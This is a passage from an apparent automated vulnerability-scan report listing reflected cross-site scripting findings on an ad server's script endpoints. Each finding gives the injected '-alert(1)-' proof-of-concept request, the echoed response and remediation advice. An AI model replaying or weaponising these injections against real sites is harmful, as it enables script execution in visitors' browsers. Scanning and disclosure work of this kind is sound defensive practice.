Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; blue=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Tue, 10 May 2011 13:35:41 GMT
Connection: close
Content-Length: 8008

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
rticle_above;net=idgt;u=,idgt-26242497_1305034541,11f8f328940989e,none,idgt.careers_l-idgt.gadgets_h-bz.25-dx.16-dx.23-dx.17-mm.ag1-mm.ak1-mm.am1-mm.aq1-cm.ent_h-cm.music_h-cm.weath_h-cm.sports_h;;sec=4ca6d'-alert(1)-'f7490aa7e07;contx=none;dc=w;btg=idgt.careers_l;btg=idgt.gadgets_h;btg=bz.25;btg=dx.16;btg=dx.23;btg=dx.17;btg=mm.ag1;btg=mm.ak1;btg=mm.am1;btg=mm.aq1;btg=cm.ent_h;btg=cm.music_h;btg=cm.weath_h;btg=cm.sports_h?","
...[SNIP]...

4.31. http://a.collective-media.net/cmadj/ns.androidcentral/general [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/ns.androidcentral/general

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f2e03'-alert(1)-'6bcda574138 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadjf2e03'-alert(1)-'6bcda574138/ns.androidcentral/general;ppos=atf;kw=;tile=1;dcopt=ist;sz=728x90;net=ns;ord=%202250960881356150;ord1=196261;cmpgurl=http%253A//www.androidcentral.com/android-central-google-io-2011? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.androidcentral.com/android-central-google-io-2011
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; blue=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Tue, 10 May 2011 13:34:58 GMT
Connection: close
Content-Length: 7419

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("ns-75558289_1305034498","http://ad.doubleclick.net/adjf2e03'-alert(1)-'6bcda574138/ns.androidcentral/general;net=ns;u=,ns-75558289_1305034498,11f8f328940989e,itbusmb,ns.i7kt-dx.16-dx.23-dx.17-mm.ag1-mm.ak1-mm.am1-mm.aq1;;ppos=atf;kw=;tile=1;dcopt=ist;cmw=owl;sz=728x90;net=ns;ord1=19
...[SNIP]...

4.32. http://a.collective-media.net/cmadj/ns.androidcentral/general [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/ns.androidcentral/general

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 69fde'-alert(1)-'523800c80c4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/ns.androidcentral69fde'-alert(1)-'523800c80c4/general;ppos=atf;kw=;tile=1;dcopt=ist;sz=728x90;net=ns;ord=%202250960881356150;ord1=196261;cmpgurl=http%253A//www.androidcentral.com/android-central-google-io-2011? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.androidcentral.com/android-central-google-io-2011
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; blue=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Tue, 10 May 2011 13:35:01 GMT
Connection: close
Content-Length: 7417

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("ns-1735359_1305034501","http://ad.doubleclick.net/adj/ns.androidcentral69fde'-alert(1)-'523800c80c4/general;net=ns;u=,ns-1735359_1305034501,11f8f328940989e,itbusmb,ns.i7kt-dx.16-dx.23-dx.17-mm.ag1-mm.ak1-mm.am1-mm.aq1;;ppos=atf;kw=;tile=1;dcopt=ist;cmw=owl;sz=728x90;net=ns;ord1=196261;contx=itbusmb;
...[SNIP]...

4.33. http://a.collective-media.net/cmadj/ns.androidcentral/general [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/ns.androidcentral/general

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ae81e'-alert(1)-'6e077f8d62a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/ns.androidcentral/generalae81e'-alert(1)-'6e077f8d62a;ppos=atf;kw=;tile=1;dcopt=ist;sz=728x90;net=ns;ord=%202250960881356150;ord1=196261;cmpgurl=http%253A//www.androidcentral.com/android-central-google-io-2011? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.androidcentral.com/android-central-google-io-2011
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; blue=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Tue, 10 May 2011 13:35:04 GMT
Connection: close
Content-Length: 7419

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("ns-62907342_1305034504","http://ad.doubleclick.net/adj/ns.androidcentral/generalae81e'-alert(1)-'6e077f8d62a;net=ns;u=,ns-62907342_1305034504,11f8f328940989e,itbusmb,ns.i7kt-dx.16-dx.23-dx.17-mm.ag1-mm.ak1-mm.am1-mm.aq1;;ppos=atf;kw=;tile=1;dcopt=ist;cmw=owl;sz=728x90;net=ns;ord1=196261;contx=itbusmb;dc=w;bt
...[SNIP]...

4.34. http://a.collective-media.net/cmadj/ns.androidcentral/general [ppos parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/ns.androidcentral/general

Issue detail

The value of the ppos request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3e961'-alert(1)-'4ba879699ea was submitted in the ppos parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/ns.androidcentral/general;ppos=3e961'-alert(1)-'4ba879699ea HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.androidcentral.com/android-central-google-io-2011
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; blue=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Tue, 10 May 2011 13:34:17 GMT
Connection: close
Content-Length: 7325

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
chAd("ns-62677303_1305034457","http://ad.doubleclick.net/adj/ns.androidcentral/general;net=ns;u=,ns-62677303_1305034457,11f8f328940989e,none,ns.i7kt-dx.16-dx.23-dx.17-mm.ag1-mm.ak1-mm.am1-mm.aq1;;ppos=3e961'-alert(1)-'4ba879699ea;contx=none;dc=w;btg=ns.i7kt;btg=dx.16;btg=dx.23;btg=dx.17;btg=mm.ag1;btg=mm.ak1;btg=mm.am1;btg=mm.aq1?","0","0",false);</scr'+'ipt>
...[SNIP]...

4.35. http://a.collective-media.net/cmadj/ns.androidcentral/general/archive [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/ns.androidcentral/general/archive

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1536c'-alert(1)-'3d68f1b813a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj1536c'-alert(1)-'3d68f1b813a/ns.androidcentral/general/archive;ppos=btf;kw=;tile=2;sz=300x250,336x280;net=ns;ord=2250960881356150;ord1=505344;cmpgurl=http%253A//www.androidcentral.com/android-central-google-io-2011? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.androidcentral.com/android-central-google-io-2011
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; blue=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Tue, 10 May 2011 13:37:05 GMT
Connection: close
Content-Length: 7426

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("ns-7601100_1305034625","http://ad.doubleclick.net/adj1536c'-alert(1)-'3d68f1b813a/ns.androidcentral/general/archive;net=ns;u=,ns-7601100_1305034625,11f8f328940989e,itbusmb,ns.i7kt-dx.16-dx.23-dx.17-mm.ag1-mm.ak1-mm.am1-mm.aq1;;ppos=btf;kw=;tile=2;cmw=owl;sz=300x250,336x280;net=ns;o
...[SNIP]...

4.36. http://a.collective-media.net/cmadj/ns.androidcentral/general/archive [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/ns.androidcentral/general/archive

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 70880'-alert(1)-'374fee92e30 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/ns.androidcentral70880'-alert(1)-'374fee92e30/general/archive;ppos=btf;kw=;tile=2;sz=300x250,336x280;net=ns;ord=2250960881356150;ord1=505344;cmpgurl=http%253A//www.androidcentral.com/android-central-google-io-2011? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.androidcentral.com/android-central-google-io-2011
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; blue=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Tue, 10 May 2011 13:37:06 GMT
Connection: close
Content-Length: 7428

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("ns-20639338_1305034626","http://ad.doubleclick.net/adj/ns.androidcentral70880'-alert(1)-'374fee92e30/general/archive;net=ns;u=,ns-20639338_1305034626,11f8f328940989e,itbusmb,ns.i7kt-dx.16-dx.23-dx.17-mm.ag1-mm.ak1-mm.am1-mm.aq1;;ppos=btf;kw=;tile=2;cmw=owl;sz=300x250,336x280;net=ns;ord1=505344;contx=
...[SNIP]...

4.37. http://a.collective-media.net/cmadj/ns.androidcentral/general/archive [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/ns.androidcentral/general/archive

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ed33f'-alert(1)-'e14152a35ae was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/ns.androidcentral/generaled33f'-alert(1)-'e14152a35ae/archive;ppos=btf;kw=;tile=2;sz=300x250,336x280;net=ns;ord=2250960881356150;ord1=505344;cmpgurl=http%253A//www.androidcentral.com/android-central-google-io-2011? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.androidcentral.com/android-central-google-io-2011
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; blue=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Tue, 10 May 2011 13:37:07 GMT
Connection: close
Content-Length: 7428

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("ns-82822339_1305034627","http://ad.doubleclick.net/adj/ns.androidcentral/generaled33f'-alert(1)-'e14152a35ae/archive;net=ns;u=,ns-82822339_1305034627,11f8f328940989e,itbusmb,ns.i7kt-dx.16-dx.23-dx.17-mm.ag1-mm.ak1-mm.am1-mm.aq1;;ppos=btf;kw=;tile=2;cmw=owl;sz=300x250,336x280;net=ns;ord1=505344;contx=itbusmb;
...[SNIP]...

4.38. http://a.collective-media.net/cmadj/ns.androidcentral/general/archive [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/ns.androidcentral/general/archive

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4d9ed'-alert(1)-'5ddf31af3e8 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/ns.androidcentral/general/archive4d9ed'-alert(1)-'5ddf31af3e8;ppos=btf;kw=;tile=2;sz=300x250,336x280;net=ns;ord=2250960881356150;ord1=505344;cmpgurl=http%253A//www.androidcentral.com/android-central-google-io-2011? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.androidcentral.com/android-central-google-io-2011
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; blue=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Tue, 10 May 2011 13:37:08 GMT
Connection: close
Content-Length: 7428

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("ns-40396262_1305034628","http://ad.doubleclick.net/adj/ns.androidcentral/general/archive4d9ed'-alert(1)-'5ddf31af3e8;net=ns;u=,ns-40396262_1305034628,11f8f328940989e,itbusmb,ns.i7kt-dx.16-dx.23-dx.17-mm.ag1-mm.ak1-mm.am1-mm.aq1;;ppos=btf;kw=;tile=2;cmw=owl;sz=300x250,336x280;net=ns;ord1=505344;contx=itbusmb;dc=w;btg
...[SNIP]...

4.39. http://a.collective-media.net/cmadj/ns.androidcentral/general/archive [ppos parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/ns.androidcentral/general/archive

Issue detail

The value of the ppos request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 60e7d'-alert(1)-'94313355a5c was submitted in the ppos parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/ns.androidcentral/general/archive;ppos=60e7d'-alert(1)-'94313355a5c HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.androidcentral.com/android-central-google-io-2011
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; blue=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Tue, 10 May 2011 13:36:50 GMT
Connection: close
Content-Length: 7333

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
-53742245_1305034610","http://ad.doubleclick.net/adj/ns.androidcentral/general/archive;net=ns;u=,ns-53742245_1305034610,11f8f328940989e,none,ns.i7kt-dx.16-dx.23-dx.17-mm.ag1-mm.ak1-mm.am1-mm.aq1;;ppos=60e7d'-alert(1)-'94313355a5c;contx=none;dc=w;btg=ns.i7kt;btg=dx.16;btg=dx.23;btg=dx.17;btg=mm.ag1;btg=mm.ak1;btg=mm.am1;btg=mm.aq1?","0","0",false);</scr'+'ipt>
...[SNIP]...

4.40. http://a.collective-media.net/cmadj/ns.knowyourmobile/general [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/ns.knowyourmobile/general

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bc43f'-alert(1)-'8478e6518a6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadjbc43f'-alert(1)-'8478e6518a6/ns.knowyourmobile/general;ppos=atf;kw=;tile=2;sz=728x90;net=ns;ord=2513010054826736;ord1=877377;cmpgurl=http%253A//www.knowyourmobile.com/features/881740/google_io_what_to_expect.html? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.knowyourmobile.com/features/881740/google_io_what_to_expect.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; blue=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Tue, 10 May 2011 13:39:40 GMT
Connection: close
Content-Length: 7407

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("ns-26189648_1305034780","http://ad.doubleclick.net/adjbc43f'-alert(1)-'8478e6518a6/ns.knowyourmobile/general;net=ns;u=,ns-26189648_1305034780,11f8f328940989e,itdeweb,ns.i7kt-dx.16-dx.23-dx.17-mm.ag1-mm.ak1-mm.am1-mm.aq1;;ppos=atf;kw=;tile=2;cmw=nurl;sz=728x90;net=ns;ord1=877377;cont
...[SNIP]...

4.41. http://a.collective-media.net/cmadj/ns.knowyourmobile/general [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/ns.knowyourmobile/general

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 15b2d'-alert(1)-'fe3576fbb9c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/ns.knowyourmobile15b2d'-alert(1)-'fe3576fbb9c/general;ppos=atf;kw=;tile=2;sz=728x90;net=ns;ord=2513010054826736;ord1=877377;cmpgurl=http%253A//www.knowyourmobile.com/features/881740/google_io_what_to_expect.html? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.knowyourmobile.com/features/881740/google_io_what_to_expect.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; blue=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Tue, 10 May 2011 13:39:45 GMT
